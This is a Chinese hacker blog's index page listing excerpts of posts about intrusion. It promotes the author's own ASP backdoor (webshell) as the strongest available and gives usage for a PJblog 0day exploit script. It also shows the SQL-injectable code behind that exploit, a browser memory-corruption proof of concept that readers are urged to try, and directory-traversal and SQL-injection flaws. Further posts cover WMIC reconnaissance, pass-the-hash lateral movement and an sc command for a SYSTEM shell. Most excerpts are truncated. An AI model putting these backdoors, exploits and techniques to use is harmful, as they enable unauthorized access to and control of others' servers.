导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

Linux爆本地提权漏洞 请立即更新udev程序

新闻来源:milw0rm.com

Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)

修复方法(修复前请备份重要数据):

 

debian用户请执行apt-get update ; apt-get upgrade -y

centos用户请执行yum update udev

RedHat用户请使用官方rpm包更新或者购买

....

PJblog V3.0 0day Vbs版漏洞利用工具

用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

截图如下: 

PJblog V3.0 0day+EXP

Author:bink

漏洞文件:action.asp

 

很SB的洞。

第14行

strcname=request("cname")

set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

....

server limit dos

墨西哥同学周末很郁闷的在宾馆上网,发现youtube被ban了,于是写个了tool解决这个问题。顺带想到了一种利用 google 统计的漏洞,写在这里了

http://sirdarckcat.blogspot.com/2009/04/how-to-use-google-analytics-to-dos.html

这个问题实际上是由于 webserver 的 request field limit 造成的。

当 http request header 过长时,webserver 会产生一个400 或者 4xx 错误

 

Your browser sent a request that this server could not understand.

Size of a request header field exceeds server limit.

MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)

明生注:将他保存为html然后打开试试,哈哈。好玩

<!--

MS09-014: MSIE EMBED element race condition memory corruption

Code by SkyLined <berendjanwever@gmail.com>

http://skypher.com/SkyLined/Repro/MSIE/EMBED%20memory%20corruption/repro3.html

http://skypher.com/index.php/2009/04/19/ms09-014-embed-element-memory-corruption

-->

.....

mypic v2.1 正式版 遍历文件漏洞

源码下载:  http://bbs.diqiye.com/thread-1731-1-1.html

(官方比较变态注册还需要半个小时回复才能下载另一个下载连接http://down.cnzz.cn/Info/47339.aspx)

官方网站:  http://www.diqiye.com/mypic/

漏洞等级:中高

漏洞说明:

/bom.php (文件没做任何访问限制)

if (isset($_GET['dir'])){ //config the basedir

    $basedir=$_GET['dir'];//这个没做过滤可以输入任何目录

}else{

    $basedir

....

Command-Line Ninjitsu

明生注:渗透时使用不错的技巧....

Recently I wrote a blog post about using some basic native DOS commands to extract information from a target PC about user accounts, shares, software, networking information etc...



What I didn't cover in that post was WMIC (Windows Management Instrumentation Command). If that previous post was say the equivelent of DOS Kung Fu then WMIC to me is the Ninjitsu of DOS.



The pupose of this post is to describe and list WMIC commands that can be used to derive information from a target, and that information could be useful to either a

...

Geeklog SEC_authenticate()函数SQL注入漏洞

Geeklog是一个免费的、开放源码的Web应用程序。它可以使用户创建一个虚拟的社区,可以管理用户,张贴文章等。Geeklog采用PHP实现,以MySQL为后台数据库。

Geeklog的index.php模块中的SEC_authenticate()函数没有正确的验证用户所提交的PHP_AUTH_USER和 REMOTE_USER变量参数,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击。以下是/public_html/webservices /atom/index.php文件中34-53行的有漏洞代码段:

....

[原创]明生使用笔记之Hash注入式攻击

作者:心动吧明生KISS

转载请注明:http://www.abcxd.com

上一篇文章: http://www.abcxd.com/abcxd/abcxdArticle/setou/HASH-gsecdump-psexec.html

在写文章先要感谢了一下玫瑰同志,因为不是他转的文章,我也看不到。也学不到新的技术..

在拿了服务器后,一般要渗透到其他的机子上确实是一件很困难的事情,而现在的这一个技术主要是通过查询其他同共享机子上面的Hash然后破译其他密码....之后就~~~~

....

HASH注入式攻击

To get a DOS Prompt as NT system:



C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact

[SC] CreateService SUCCESS



C:\>sc start shellcmdline

[SC] StartService FAILED 1053:

....

分页:[«]11[12][13][14][15][16][17][18][19][20][21][22][23][24][25][»]

日历

<< 2014-4 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved